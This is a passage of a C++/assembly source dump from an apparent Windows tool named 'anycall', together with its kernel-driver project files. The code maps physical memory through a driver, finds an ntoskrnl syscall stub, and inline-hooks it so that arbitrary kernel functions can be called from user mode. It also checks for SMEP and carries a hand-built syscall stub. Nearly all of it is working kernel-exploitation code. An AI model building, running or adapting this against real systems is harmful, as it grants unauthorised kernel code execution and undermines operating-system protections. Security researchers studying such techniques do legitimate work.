57 |
58 | LOG( "[:] using defaults: [\"%s\"] [\"%s\"]\n\n",
59 | DEFAULT_MODULE_NAME, DEFAULT_FUNCTION_NAME );
60 | }
61 |
62 | const auto is_smep_present = smep::is_smep_enabled();
63 |
64 | LOG( "[~] smep: %s\n",
65 | is_smep_present ?
66 | "\033[0;102;30mpresent\033[0m" :
67 | "\033[0;101;30mnot present\033[0m" );
68 |
69 | if ( !io::init() )
70 | {
71 | LOG( "[!] \033[0;101;30mfailed to init io\033[0m\n" );
72 | std::cin.ignore();
73 | return EXIT_FAILURE;
74 | }
75 |
76 | //
77 | // we can hook ANY functions that exported by ntoskrnl
78 | //
79 | if ( !syscall::setup(
80 | use_default ? DEFAULT_MODULE_NAME : module_name, // module name
81 | use_default ? DEFAULT_FUNCTION_NAME : function_name ) ) // function name
82 | {
83 | LOG( "[!] \033[0;101;30mfailed to setup syscall-hook\033[0m\n" );
84 | std::cin.ignore();
85 | return EXIT_FAILURE;
86 | }
87 |
88 | //
89 | // wow, PsGetCurrentProcessId is kernel function but?
90 | //
91 | uint32_t process_id = ( uint32_t )SYSCALL( PsGetCurrentProcessId );
92 | LOG( "\n[:] PsGetCurrentProcessId: 0x%llX (%d)\n", process_id, process_id );
93 |
94 | std::cin.ignore();
95 | return EXIT_SUCCESS;
96 | }
--------------------------------------------------------------------------------
/anycall/nt.hpp:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | MIT License
4 |
5 | Copyright (c) 2021 Kento Oki
6 |
7 | Permission is hereby granted, free of charge, to any person obtaining a copy
8 | of this software and associated documentation files (the "Software"), to deal
9 | in the Software without restriction, including without limitation the rights
10 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
11 | copies of the Software, and to permit persons to whom the Software is
12 | furnished to do so, subject to the following conditions:
13 |
14 | The above copyright notice and this permission notice shall be included in all
15 | copies or substantial portions of the Software.
16 |
17 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
18 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
19 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
20 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
21 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
22 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
23 | SOFTWARE.
24 |
25 | */
26 |
27 | #pragma once
28 | #include
29 |
30 | //
31 | // windows native definitions
32 | //
33 |
34 | typedef LARGE_INTEGER PHYSICAL_ADDRESS, * PPHYSICAL_ADDRESS;
35 |
36 | typedef struct _PHYSICAL_MEMORY_RANGE {
37 | PHYSICAL_ADDRESS BaseAddress;
38 | LARGE_INTEGER NumberOfBytes;
39 | } PHYSICAL_MEMORY_RANGE, * PPHYSICAL_MEMORY_RANGE;
40 |
41 | #ifndef _NTDEF_
42 | typedef _Return_type_success_( return >= 0 ) LONG NTSTATUS;
43 | typedef NTSTATUS* PNTSTATUS;
44 | #endif
45 |
46 | #ifndef NT_SUCCESS
47 | #define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
48 | #endif
49 |
50 | #define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
51 | #define STATUS_UNSUCCESSFUL ((NTSTATUS)0xC0000001L)
52 | #define STATUS_NOT_IMPLEMENTED ((NTSTATUS)0xC0000002L)
53 | #define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
54 | #define STATUS_INVALID_CID ((NTSTATUS)0xC000000BL)
55 | #define STATUS_NO_SUCH_DEVICE ((NTSTATUS)0xC000000EL)
56 | #define STATUS_NO_SUCH_FILE ((NTSTATUS)0xC000000FL)
57 | #define STATUS_INVALID_DEVICE_REQUEST ((NTSTATUS)0xC0000010L)
58 | #define STATUS_MORE_PROCESSING_REQUIRED ((NTSTATUS)0xC0000016L)
59 | #define STATUS_CONFLICTING_ADDRESSES ((NTSTATUS)0xC0000018L)
60 | #define STATUS_NO_MORE_ENTRIES ((NTSTATUS)0x8000001AL)
61 | #define STATUS_BUFFER_TOO_SMALL ((NTSTATUS)0xC0000023L)
62 | #define STATUS_INVALID_PAGE_PROTECTION ((NTSTATUS)0xC0000045L)
63 | #define STATUS_PROCEDURE_NOT_FOUND ((NTSTATUS)0xC000007AL)
64 | #define STATUS_INSUFFICIENT_RESOURCES ((NTSTATUS)0xC000009AL)
65 | #define STATUS_INSTRUCTION_MISALIGNMENT ((NTSTATUS)0xC00000AAL)
66 | #define STATUS_INTERNAL_ERROR ((NTSTATUS)0xC00000E5L)
67 | #define STATUS_INVALID_PARAMETER_1 ((NTSTATUS)0xC00000EFL)
68 | #define STATUS_INVALID_PARAMETER_2 ((NTSTATUS)0xC00000F0L)
69 | #define STATUS_INVALID_PARAMETER_3 ((NTSTATUS)0xC00000F1L)
70 | #define STATUS_INVALID_PARAMETER_4 ((NTSTATUS)0xC00000F2L)
71 | #define STATUS_INVALID_PARAMETER_5 ((NTSTATUS)0xC00000F3L)
72 | #define STATUS_INVALID_PARAMETER_6 ((NTSTATUS)0xC00000F4L)
73 | #define STATUS_INVALID_PARAMETER_7 ((NTSTATUS)0xC00000F5L)
74 | #define STATUS_INVALID_PARAMETER_8 ((NTSTATUS)0xC00000F6L)
75 | #define STATUS_INVALID_PARAMETER_9 ((NTSTATUS)0xC00000F7L)
76 | #define STATUS_INVALID_PARAMETER_10 ((NTSTATUS)0xC00000F8L)
77 | #define STATUS_INVALID_PARAMETER_11 ((NTSTATUS)0xC00000F9L)
78 | #define STATUS_INVALID_PARAMETER_12 ((NTSTATUS)0xC00000FAL)
79 | #define STATUS_INVALID_ADDRESS ((NTSTATUS)0xC0000141L)
80 | #define STATUS_DATATYPE_MISALIGNMENT_ERROR ((NTSTATUS)0xC00002C5L)
81 |
82 | typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY
83 | {
84 | ULONG Unknow1;
85 | ULONG Unknow2;
86 | ULONG Unknow3;
87 | ULONG Unknow4;
88 | PVOID DllBase;
89 | ULONG Size;
90 | ULONG Flags;
91 | USHORT Index;
92 | USHORT NameLength;
93 | USHORT LoadCount;
94 | USHORT ModuleNameOffset;
95 | char ImageName[ 256 ];
96 | } SYSTEM_MODULE_INFORMATION_ENTRY, * PSYSTEM_MODULE_INFORMATION_ENTRY;
97 |
98 | typedef enum _SYSTEM_INFORMATION_CLASS_EX
99 | {
100 | SystemBasicInformation = 0,
101 | SystemProcessorInformation = 1,
102 | SystemPerformanceInformation = 2,
103 | SystemTimeOfDayInformation = 3,
104 | SystemPathInformation = 4,
105 | SystemProcessInformation = 5,
106 | SystemCallCountInformation = 6,
107 | SystemDeviceInformation = 7,
108 | SystemProcessorPerformanceInformation = 8,
109 | SystemFlagsInformation = 9,
110 | SystemCallTimeInformation = 10,
111 | SystemModuleInformation = 11,
112 | SystemLocksInformation = 12,
113 | SystemStackTraceInformation = 13,
114 | SystemPagedPoolInformation = 14,
115 | SystemNonPagedPoolInformation = 15,
116 | SystemHandleInformation = 16,
117 | SystemObjectInformation = 17,
118 | SystemPageFileInformation = 18,
119 | SystemVdmInstemulInformation = 19,
120 | SystemVdmBopInformation = 20,
121 | SystemFileCacheInformation = 21,
122 | SystemPoolTagInformation = 22,
123 | SystemInterruptInformation = 23,
124 | SystemDpcBehaviorInformation = 24,
125 | SystemFullMemoryInformation = 25,
126 | SystemLoadGdiDriverInformation = 26,
127 | SystemUnloadGdiDriverInformation = 27,
128 | SystemTimeAdjustmentInformation = 28,
129 | SystemSummaryMemoryInformation = 29,
130 | SystemMirrorMemoryInformation = 30,
131 | SystemPerformanceTraceInformation = 31,
132 | SystemObsolete0 = 32,
133 | SystemExceptionInformation = 33,
134 | SystemCrashDumpStateInformation = 34,
135 | SystemKernelDebuggerInformation = 35,
136 | SystemContextSwitchInformation = 36,
137 | SystemRegistryQuotaInformation = 37,
138 | SystemExtendServiceTableInformation = 38,
139 | SystemPrioritySeperation = 39,
140 | SystemVerifierAddDriverInformation = 40,
141 | SystemVerifierRemoveDriverInformation = 41,
142 | SystemProcessorIdleInformation = 42,
143 | SystemLegacyDriverInformation = 43,
144 | SystemCurrentTimeZoneInformation = 44,
145 | SystemLookasideInformation = 45,
146 | SystemTimeSlipNotification = 46,
147 | SystemSessionCreate = 47,
148 | SystemSessionDetach = 48,
149 | SystemSessionInformation = 49,
150 | SystemRangeStartInformation = 50,
151 | SystemVerifierInformation = 51,
152 | SystemVerifierThunkExtend = 52,
153 | SystemSessionProcessInformation = 53,
154 | SystemLoadGdiDriverInSystemSpace = 54,
155 | SystemNumaProcessorMap = 55,
156 | SystemPrefetcherInformation = 56,
157 | SystemExtendedProcessInformation = 57,
158 | SystemRecommendedSharedDataAlignment = 58,
159 | SystemComPlusPackage = 59,
160 | SystemNumaAvailableMemory = 60,
161 | SystemProcessorPowerInformation = 61,
162 | SystemEmulationBasicInformation = 62,
163 | SystemEmulationProcessorInformation = 63,
164 | SystemExtendedHandleInformation = 64,
165 | SystemLostDelayedWriteInformation = 65,
166 | SystemBigPoolInformation = 66,
167 | SystemSessionPoolTagInformation = 67,
168 | SystemSessionMappedViewInformation = 68,
169 | SystemHotpatchInformation = 69,
170 | SystemObjectSecurityMode = 70,
171 | SystemWatchdogTimerHandler = 71,
172 | SystemWatchdogTimerInformation = 72,
173 | SystemLogicalProcessorInformation = 73,
174 | SystemWow64SharedInformation = 74,
175 | SystemRegisterFirmwareTableInformationHandler = 75,
176 | SystemFirmwareTableInformation = 76,
177 | SystemModuleInformationEx = 77,
178 | SystemVerifierTriageInformation = 78,
179 | SystemSuperfetchInformation = 79,
180 | SystemMemoryListInformation = 80,
181 | SystemFileCacheInformationEx = 81,
182 | MaxSystemInfoClass = 82,
183 | SystemSpeculationControlInformation = 201
184 | } SYSTEM_INFORMATION_CLASS_EX;
185 |
186 | typedef struct _SYSTEM_MODULE_INFORMATION
187 | {
188 | ULONG Count;
189 | SYSTEM_MODULE_INFORMATION_ENTRY Modules[ 1 ];
190 | } SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;
191 |
192 | typedef NTSTATUS( WINAPI* PFN_NT_QUERY_SYSTEM_INFORMATION )(
193 | IN SYSTEM_INFORMATION_CLASS_EX SystemInformationClass,
194 | OUT PVOID SystemInformation,
195 | IN ULONG SystemInformationLength,
196 | OUT PULONG ReturnLength
197 | );
198 |
199 | //
200 | // https://github.com/ionescu007/SpecuCheck/blob/master/specucheck.c#L38
201 | //
202 | typedef struct _SYSTEM_SPECULATION_CONTROL_INFORMATION {
203 | struct {
204 | ULONG BpbEnabled : 1;
205 | ULONG BpbDisabledSystemPolicy : 1;
206 | ULONG BpbDisabledNoHardwareSupport : 1;
207 | ULONG SpecCtrlEnumerated : 1;
208 | ULONG SpecCmdEnumerated : 1;
209 | ULONG IbrsPresent : 1;
210 | ULONG StibpPresent : 1;
211 | ULONG SmepPresent : 1;
212 | ULONG SpeculativeStoreBypassDisableAvailable : 1;
213 | ULONG SpeculativeStoreBypassDisableSupported : 1;
214 | ULONG SpeculativeStoreBypassDisabledSystemWide : 1;
215 | ULONG SpeculativeStoreBypassDisabledKernel : 1;
216 | ULONG SpeculativeStoreBypassDisableRequired : 1;
217 | ULONG BpbDisabledKernelToUser : 1;
218 | ULONG SpecCtrlRetpolineEnabled : 1;
219 | ULONG SpecCtrlImportOptimizationEnabled : 1;
220 | ULONG Reserved : 16;
221 | } SpeculationControlFlags;
222 | } SYSTEM_SPECULATION_CONTROL_INFORMATION, * PSYSTEM_SPECULATION_CONTROL_INFORMATION;
--------------------------------------------------------------------------------
/anycall/smep.hpp:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include
3 |
4 | #include "nt.hpp"
5 |
6 | namespace smep
7 | {
8 | bool is_smep_enabled()
9 | {
10 | NTSTATUS nt_status;
11 | SYSTEM_SPECULATION_CONTROL_INFORMATION spec_information;
12 | PFN_NT_QUERY_SYSTEM_INFORMATION pNtQuerySystemInformation;
13 |
14 | pNtQuerySystemInformation =
15 | ( PFN_NT_QUERY_SYSTEM_INFORMATION )
16 | GetProcAddress(
17 | GetModuleHandle( TEXT( "ntdll.dll" ) ),
18 | "NtQuerySystemInformation" );
19 |
20 | if ( !pNtQuerySystemInformation )
21 | {
22 | return false;
23 | }
24 |
25 | nt_status = pNtQuerySystemInformation(
26 | SystemSpeculationControlInformation,
27 | &spec_information,
28 | sizeof( spec_information ),
29 | NULL );
30 |
31 | if ( !NT_SUCCESS( nt_status ) )
32 | {
33 | return false;
34 | }
35 |
36 | return
37 | spec_information
38 | .SpeculationControlFlags
39 | .SmepPresent ? true : false;
40 | }
41 | } // namespace smep
--------------------------------------------------------------------------------
/anycall/syscall.asm:
--------------------------------------------------------------------------------
1 | .code
2 |
3 | syscall_handler proc
4 | mov r10, rcx
5 | mov eax, 000h ; syscall number will be dynamically set by syscall::setup
6 | syscall
7 | ret
8 | syscall_handler endp
9 |
10 | end
--------------------------------------------------------------------------------
/anycall/syscall.hpp:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | MIT License
4 |
5 | Copyright (c) 2021 Kento Oki
6 |
7 | Permission is hereby granted, free of charge, to any person obtaining a copy
8 | of this software and associated documentation files (the "Software"), to deal
9 | in the Software without restriction, including without limitation the rights
10 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
11 | copies of the Software, and to permit persons to whom the Software is
12 | furnished to do so, subject to the following conditions:
13 |
14 | The above copyright notice and this permission notice shall be included in all
15 | copies or substantial portions of the Software.
16 |
17 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
18 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
19 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
20 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
21 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
22 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
23 | SOFTWARE.
24 |
25 | */
26 |
27 | #pragma once
28 | #include
29 |
30 | #include "logger.hpp"
31 | #include "helper.hpp"
32 | #include "driver.hpp"
33 | #include "cpudef.hpp"
34 | #include "hook.hpp"
35 | #include "nt.hpp"
36 |
37 | #define KB( x ) ( ( size_t ) ( x ) << 10 )
38 | #define MB( x ) ( ( size_t ) ( x ) << 20 )
39 |
40 | //
41 | // length of stub to scan
42 | //
43 | #define STUB_SCAN_LENGTH 0x20
44 |
45 | //
46 | // use this if you are lazy
47 | // all you need is define prototype of the function
48 | //
49 | #define SYSCALL( function_name, ... ) \
50 | syscall::invoke< function_name >( \
51 | ( void* )( helper::find_ntoskrnl_export( #function_name ), __VA_ARGS__) )
52 |
53 | // this is huge structure to define here...
54 | using PEPROCESS = PVOID;
55 |
56 | using PsLookupProcessByProcessId = NTSTATUS( __fastcall* )(
57 | HANDLE ProcessId,
58 | PEPROCESS* Process );
59 |
60 | using PsGetProcessSectionBaseAddress = PVOID( __fastcall* )(
61 | PEPROCESS Process );
62 |
63 | using PsGetCurrentProcessId = HANDLE( __fastcall* )( void );
64 |
65 | using MmGetPhysicalAddress = PHYSICAL_ADDRESS( __fastcall* )(
66 | PVOID BaseAddress );
67 |
68 | //
69 | // our syscall handler built by assembly
70 | // syscall number is at offset 0x4 and
71 | // will be set by syscall::setup
72 | // only supports x64
73 | //
74 | // 0x4C 0x8B 0xD1 0xB8 0xFF 0xFF 0x00 0x00 0x0F 0x05 0xC3
75 | // ^^^^^^^^^
76 | //
77 | // 0: 4c 8b d1 mov r10, rcx
78 | // 3: b8 ff ff 00 00 mov eax, 0xffff ; syscall number
79 | // 8: 0f 05 syscall
80 | // a: c3 ret
81 | //
82 | // syscall_handler --> KiSystemCall64 --> [hooked internal syscall] --> [detour]
83 | // | USER | KERNEL |
84 | //
85 | extern "C" void* syscall_handler();
86 |
87 | namespace syscall
88 | {
89 | //
90 | // this points to the desired hook syscall function
91 | // that mapped to our user virtual address
92 | //
93 | inline void* function;
94 |
95 | //
96 | // does certain syscall-hook found?
97 | //
98 | inline bool found;
99 |
100 | //
101 | // cache function stub got from ntoskrnl.exe rva
102 | //
103 | inline uint8_t stub[ STUB_SCAN_LENGTH ];
104 | inline uint16_t page_offset;
105 |
106 | //
107 | // any kernel code execution - anycall
108 | //
109 | template < class FnType, class ... Args >
110 | std::invoke_result_t< FnType, Args... > invoke(
111 | void* detour, Args ... augments )
112 | {
113 | //
114 | // void function cannot return
115 | //
116 | constexpr auto is_ret_type_void =
117 | std::is_same<
118 | std::invoke_result_t< FnType, Args... >, void >{};
119 |
120 | //
121 | // inline-hook against desired arbitrary syscall
122 | //
123 | hook::hook( syscall::function, detour, true );
124 |
125 | if constexpr ( is_ret_type_void )
126 | {
127 | //
128 | // invoke syscall
129 | //
130 | reinterpret_cast< FnType >( syscall_handler )( augments ... );
131 | }
132 | else
133 | {
134 | //
135 | // invoke syscall
136 | //
137 | const auto invoke_result =
138 | reinterpret_cast< FnType >( syscall_handler )( augments ... );
139 |
140 | //
141 | // unhook immediately
142 | //
143 | hook::unhook( syscall::function, true );
144 |
145 | return invoke_result;
146 | }
147 |
148 | //
149 | // unhook immediately
150 | //
151 | hook::unhook( syscall::function, true );
152 | }
153 |
154 | //
155 | // check if syscall-hook is succeeded
156 | //
157 | bool validate()
158 | {
159 | uint32_t pid_from_hooked_syscall = 0;
160 |
161 | //
162 | // wow, PsGetCurrentProcessId returns this user process's pid,
163 | // if the syscall-hook is succeeded
164 | //
165 | pid_from_hooked_syscall = ( uint32_t )SYSCALL( PsGetCurrentProcessId );
166 |
167 | const bool is_syscall_ok =
168 | pid_from_hooked_syscall == GetCurrentProcessId();
169 |
170 | LOG( "[?] PsGetCurrentProcessId:\033[0;105;30m%d\033[0m == \033[0;105;30m%d\033[0m:GetCurrentProcessId -> %s\n",
171 | pid_from_hooked_syscall,
172 | GetCurrentProcessId(),
173 | is_syscall_ok ? "\033[0;102;30mOK\033[0m" : "\033[0;101;30mINVALID\033[0m" );
174 |
175 | return is_syscall_ok;
176 | }
177 |
178 | bool probe_for_hook( const uint64_t mapped_va )
179 | {
180 | //
181 | // compare stub of destination of hook function
182 | //
183 | if ( memcmp(
184 | reinterpret_cast< void* >( mapped_va ),
185 | stub, STUB_SCAN_LENGTH ) == 0 )
186 | {
187 | //
188 | // we can't trust this yet
189 | //
190 | syscall::function = reinterpret_cast< void* >( mapped_va );
191 |
192 | //
193 | // validate by try hook and call
194 | //
195 | return syscall::validate();
196 | }
197 |
198 | return false;
199 | }
200 |
201 | bool scan_for_range(
202 | const uint64_t start_pa, const uint64_t end_pa )
203 | {
204 | LOG( "[+] scanning for range [\033[0;103;30m0x%llX -> 0x%llX\033[0m]\n",
205 | start_pa, end_pa );
206 |
207 | const auto pa_size = start_pa + end_pa;
208 |
209 | //
210 | // lazy lambda definition
211 | //
212 | const auto iterator = [ & ](
213 | const uint64_t base, const size_t size = MB( 2 ) )
214 | {
215 | // just for logging
216 | uint32_t counter = 0;
217 |
218 | for ( auto current_page = base;
219 | current_page < base + size;
220 | current_page += PAGE_SIZE )
221 | {
222 | counter++;
223 |
224 | //
225 | // probe this page
226 | //
227 | if ( probe_for_hook( current_page ) )
228 | {
229 | LOG( "[+] stub found in range [\033[0;103;30m0x%llX -> 0x%llX\033[0m] and page \033[0;103;30m%d\033[0m\n",
230 | start_pa, end_pa, counter );
231 | return true;
232 | }
233 | }
234 |
235 | return false;
236 | };
237 |
238 | if ( pa_size <= MB( 2 ) )
239 | {
240 | const uint64_t mapped_va = driver::map_physical_memory(
241 | start_pa + page_offset, end_pa );
242 |
243 | if ( !mapped_va )
244 | {
245 | LOG( "[!] \033[0;101;30mfailed to map physical memory\033[0m\n" );
246 | return false;
247 | }
248 |
249 | if ( iterator( mapped_va, end_pa ) )
250 | return true;
251 |
252 | driver::unmap_physical_memory( mapped_va, end_pa );
253 | return false;
254 | }
255 |
256 | //
257 | // big page
258 | //
259 | const auto modulus = pa_size % MB( 2 );
260 |
261 | for ( auto part = start_pa;
262 | part < pa_size;
263 | part += MB( 2 ) )
264 | {
265 | const uint64_t mapped_va = driver::map_physical_memory(
266 | part + page_offset, MB( 2 ) );
267 |
268 | if ( !mapped_va )
269 | {
270 | LOG( "[!] \033[0;101;30mfailed to map physical memory\033[0m\n" );
271 | continue;
272 | }
273 |
274 | if ( iterator( mapped_va, MB( 2 ) ) )
275 | return true;
276 |
277 | driver::unmap_physical_memory( mapped_va, MB( 2 ) );
278 | }
279 |
280 | const uint64_t mapped_va =
281 | driver::map_physical_memory(
282 | pa_size - modulus + page_offset, modulus );
283 |
284 | if ( !mapped_va )
285 | {
286 | LOG( "[!] \033[0;101;30mfailed to map physical memory\033[0m\n" );
287 | return false;
288 | }
289 |
290 | if ( iterator( mapped_va, modulus ) )
291 | return true;
292 |
293 | driver::unmap_physical_memory( mapped_va, modulus );
294 | return false;
295 | }
296 |
297 | //
298 | // syscall-hook initialization
299 | //
300 | bool setup(
301 | const std::string_view hook_function_module_name, // module name the function contains
302 | const std::string_view hook_function_name ) // any desired hook function
303 | {
304 | // already initialized
305 | if ( syscall::found )
306 | return false;
307 |
308 | //
309 | // fetch physical memory ranges from registry
310 | //
311 | std::vector< PHYSICAL_ADDRESS_RANGE > pa_range_list;
312 | helper::query_physical_memory_ranges( pa_range_list );
313 |
314 | if ( !pa_range_list.size() )
315 | {
316 | LOG( "[!] \033[0;101;30mfailed to fetch physical memory ranges\033[0m\n" );
317 | LOG_ERROR();
318 |
319 | return false;
320 | }
321 |
322 | LOG( "[+] preparing our syscall handler...\n" );
323 |
324 | //
325 | // find syscall number from image
326 | //
327 | const uint16_t syscall_number =
328 | helper::find_syscall_number(
329 | hook_function_module_name, hook_function_name );
330 |
331 | if ( !syscall_number )
332 | {
333 | LOG( "[!] \033[0;101;30mfailed to find syscall number\033[0m\n" );
334 | LOG_ERROR();
335 |
336 | return false;
337 | }
338 |
339 | if ( !hook::copy_memory(
340 | ( void* )( ( uint64_t )syscall_handler + 0x4 ), // our syscall number offset is 0x4
341 | ( void* )const_cast< uint16_t* >( &syscall_number ), // the syscall number
342 | sizeof( uint16_t ) ) ) // size must be 0x2
343 | {
344 | LOG( "[!] \033[0;101;30mfailed to set syscall number\033[0m\n" );
345 | LOG_ERROR();
346 |
347 | return false;
348 | }
349 |
350 | LOG( "[+] syscall number for %s (0x%X) is set\n",
351 | hook_function_name.data(), syscall_number );
352 |
353 | helper::print_hex(
354 | "[+] prepared our syscall handler: \033[0;100;30m", "\033[0m",
355 | &syscall_handler, 11 );
356 |
357 | const SYSMODULE_RESULT ntoskrnl =
358 | helper::find_sysmodule_address( "ntoskrnl.exe" );
359 |
360 | std::string ntoskrnl_full_path = ntoskrnl.image_full_path;
361 | helper::replace_systemroot( ntoskrnl_full_path );
362 |
363 | if ( !ntoskrnl.base_address )
364 | {
365 | LOG( "[!] \033[0;101;30mfailed to locate ntoskrnl.exe\033[0m\n" );
366 | return false;
367 | }
368 |
369 | //
370 | // temporally buffer
371 | //
372 | uint8_t* our_ntoskrnl;
373 |
374 | our_ntoskrnl = reinterpret_cast< uint8_t* >(
375 | LoadLibrary( ntoskrnl_full_path.c_str() ) );
376 |
377 | if ( !our_ntoskrnl )
378 | {
379 | LOG( "[!] \033[0;101;30mfailed to map ntoskrnl.exe into our process\033[0m\n" );
380 | LOG_ERROR();
381 |
382 | return false;
383 | }
384 |
385 | LOG( "[+] ntoskrnl.exe is at 0x%llX (ourselves: 0x%p)\n",
386 | ntoskrnl.base_address, our_ntoskrnl );
387 |
388 | //
389 | // rva and page offset to the desired syscall function
390 | //
391 | const auto hook_function_rva =
392 | helper::find_ntoskrnl_export( hook_function_name, true /* as rva */ );
393 |
394 | if ( !hook_function_rva )
395 | {
396 | LOG( "[!] \033[0;101;30mfailed to locate %s in ntoskrnl.exe\033[0m\n",
397 | hook_function_name.data() );
398 |
399 | return false;
400 | }
401 |
402 | page_offset = hook_function_rva % PAGE_SIZE;
403 |
404 | LOG( "[+] hook function rva: 0x%llX\n", hook_function_rva );
405 | LOG( "[+] page offset: 0x%lX\n", page_offset );
406 | LOG( "[+] ntoskrnl.exe path: %s\n", ntoskrnl_full_path.c_str() );
407 |
408 | //
409 | // cache hook function stub to our buffer
410 | //
411 | memcpy(
412 | &stub[ 0 ],
413 | ( void* )( our_ntoskrnl + hook_function_rva ),
414 | STUB_SCAN_LENGTH );
415 |
416 | FreeLibrary( ( HMODULE )our_ntoskrnl );
417 |
418 | helper::print_hex(
419 | "[+] function stub: \033[0;100;30m", "\033[0m",
420 | ( void* )stub, STUB_SCAN_LENGTH);
421 |
422 | //
423 | // scan for every single physical memory ranges
424 | //
425 | for ( const auto& pa_range : pa_range_list )
426 | {
427 | if ( scan_for_range( pa_range.start_pa, pa_range.end_pa ) )
428 | {
429 | //
430 | // physical address of the syscall::function va
431 | //
432 | PHYSICAL_ADDRESS physical_address =
433 | syscall::invoke< MmGetPhysicalAddress >(
434 | ( void* )helper::find_ntoskrnl_export( "MmGetPhysicalAddress" ),
435 | syscall::function );
436 |
437 | LOG( "[+] %s found at \033[0;103;30m0x%llX\033[0m\n",
438 | hook_function_name.data(),
439 | syscall::function, physical_address.QuadPart );
440 |
441 | syscall::found = true;
442 | break;
443 | }
444 | }
445 |
446 | if ( !syscall::found )
447 | {
448 | LOG( "[!] \033[0;101;30msyscall was not found\033[0m\n" );
449 | return false;
450 | }
451 |
452 | return true;
453 | }
454 | } // namespace syscall
--------------------------------------------------------------------------------
/anydrv/anydrv.inf:
--------------------------------------------------------------------------------
1 | [Version]
2 | Signature="$WINDOWS NT$"
3 | Class=System
4 | ClassGuid={4d36e97d-e325-11ce-bfc1-08002be10318}
5 | Provider=CPOC
6 | DriverVer=0
7 | CatalogFile=anydrv.cat
8 | PnpLockDown=1
9 |
10 | [DestinationDirs]
11 | DefaultDestDir = 12
12 |
13 |
14 | [SourceDisksNames]
15 | 1 = %DiskName%,,,""
16 |
17 | [SourceDisksFiles]
18 |
19 |
20 | [Strings]
21 | ManufacturerName="GodEye"
22 | ClassName=""
23 | DiskName="anydrv"
--------------------------------------------------------------------------------
/anydrv/anydrv.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 | Debug
22 | ARM
23 |
24 |
25 | Release
26 | ARM
27 |
28 |
29 | Debug
30 | ARM64
31 |
32 |
33 | Release
34 | ARM64
35 |
36 |
37 |
38 | {97dc2c4a-9a8d-4e13-8816-9126e47f22eb}
39 | {1bc93793-694f-48fe-9372-81e2b05556fd}
40 | v4.5
41 | 12.0
42 | Debug
43 | Win32
44 | anydrv
45 | $(LatestTargetPlatformVersion)
46 |
47 |
48 |
49 | Windows10
50 | true
51 | WindowsKernelModeDriver10.0
52 | Driver
53 | KMDF
54 | Universal
55 |
56 |
57 | Windows10
58 | false
59 | WindowsKernelModeDriver10.0
60 | Driver
61 | KMDF
62 | Universal
63 |
64 |
65 | Windows10
66 | true
67 | WindowsKernelModeDriver10.0
68 | Driver
69 | KMDF
70 | Universal
71 |
72 |
73 |
74 |
75 | false
76 | WindowsKernelModeDriver10.0
77 | Driver
78 | KMDF
79 | Universal
80 | false
81 |
82 |
83 | Windows10
84 | true
85 | WindowsKernelModeDriver10.0
86 | Driver
87 | KMDF
88 | Universal
89 |
90 |
91 | Windows10
92 | false
93 | WindowsKernelModeDriver10.0
94 | Driver
95 | KMDF
96 | Universal
97 |
98 |
99 | Windows10
100 | true
101 | WindowsKernelModeDriver10.0
102 | Driver
103 | KMDF
104 | Universal
105 |
106 |
107 | Windows10
108 | false
109 | WindowsKernelModeDriver10.0
110 | Driver
111 | KMDF
112 | Universal
113 |
114 |
115 |
116 |
117 |
118 |
119 |
120 |
121 |
122 |
123 | DbgengKernelDebugger
124 |
125 |
126 | DbgengKernelDebugger
127 |
128 |
129 | DbgengKernelDebugger
130 |
131 |
132 | DbgengKernelDebugger
133 | $(TargetName.Replace(' ',''))64
134 | true
135 | false
136 |
137 |
138 | DbgengKernelDebugger
139 |
140 |
141 | DbgengKernelDebugger
142 |
143 |
144 | DbgengKernelDebugger
145 |
146 |
147 | DbgengKernelDebugger
148 |
149 |
150 |
151 | false
152 |
153 |
154 |
155 |
156 |
157 |
158 |
159 |
160 |
161 |
162 |
163 |
164 |
165 |
166 |
167 |
168 |
169 |
170 |
171 |
172 |
--------------------------------------------------------------------------------
/anydrv/anydrv.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 | {8E41214B-6785-4CFE-B992-037D68949A14}
18 | inf;inv;inx;mof;mc;
19 |
20 |
21 |
22 |
23 | Source Files
